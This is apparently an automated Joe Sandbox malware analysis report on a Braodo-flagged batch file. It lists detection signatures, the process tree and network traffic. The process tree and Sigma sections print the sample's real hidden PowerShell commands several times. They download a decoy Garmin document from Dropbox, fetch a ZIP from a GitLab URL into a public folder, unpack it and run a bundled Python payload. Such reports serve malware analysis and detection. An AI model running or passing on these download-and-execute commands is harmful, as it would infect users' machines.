Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fghdsdf17.bat

Overview

General Information

Sample name:fghdsdf17.bat
Analysis ID:1578278
MD5:065d7356dd69172c50ad447904d19df9
SHA1:034f82a55696405a385720b6d5b0e669881dbbf6
SHA256:016e96cc8d72183ca8d8f2b00c3effaac50f44888504d38519dc7dbfc062f64d
Tags:batBraodouser-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator, Braodo
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5892 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 2168 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • cmd.exe (PID: 2344 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • find.exe (PID: 3276 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 2396 cmdline: findstr /L /I set "C:\Users\user\Desktop\fghdsdf17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 2340 cmdline: findstr /L /I goto "C:\Users\user\Desktop\fghdsdf17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 4100 cmdline: findstr /L /I echo "C:\Users\user\Desktop\fghdsdf17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 2500 cmdline: findstr /L /I pause "C:\Users\user\Desktop\fghdsdf17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • find.exe (PID: 4824 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 2952 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 3324 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5616 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5512 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4808 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2828 cmdline: powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
fghdsdf17.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 3324JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 5512JoeSecurity_Braodo_1Yara detected BraodoJoe Security
        Process Memory Space: powershell.exe PID: 5512JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_3324.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_5512.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security
              amsi64_5512.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi64_2828.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: PowerShell DownloadFile
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 3324, ProcessName: powershell.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 3324, ProcessName: powershell.exe
                  Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                  Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5512, TargetFilename: C:\Users\Public\Document.zip
                  Sigma detected: PowerShell Download Pattern
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 3324, ProcessName: powershell.exe
                  Sigma detected: PowerShell Web Download
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 3324, ProcessName: powershell.exe
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 3324, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 3324, ProcessName: powershell.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.0% probability
                  Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.8:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.8:49705 version: TLS 1.2
                  Source: Binary string: e.pdb source: powershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbe source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb@ source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ystem.Core.pdbb source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: m.pdbz source: powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdber source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: utomation.pdb source: powershell.exe, 00000010.00000002.1808397929.000001A329DC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1527759165.0000020CF620F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: *on.pdb source: powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Hn.pdb source: powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 0000000E.00000002.1660483962.000002C56FF71000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ion.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb\2 source: powershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbone-int.G source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb- source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb+ source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 089\System.Core.pdb source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb( source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Qe.pdb source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 6?ll\System.Core.pdb% source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000E.00000002.1660483962.000002C56FF71000.00000004.00000020.00020000.00000000.sdmp
                  Source: global trafficHTTP traffic detected: GET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
                  Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; media-src https://* blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; media-src https://* blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ 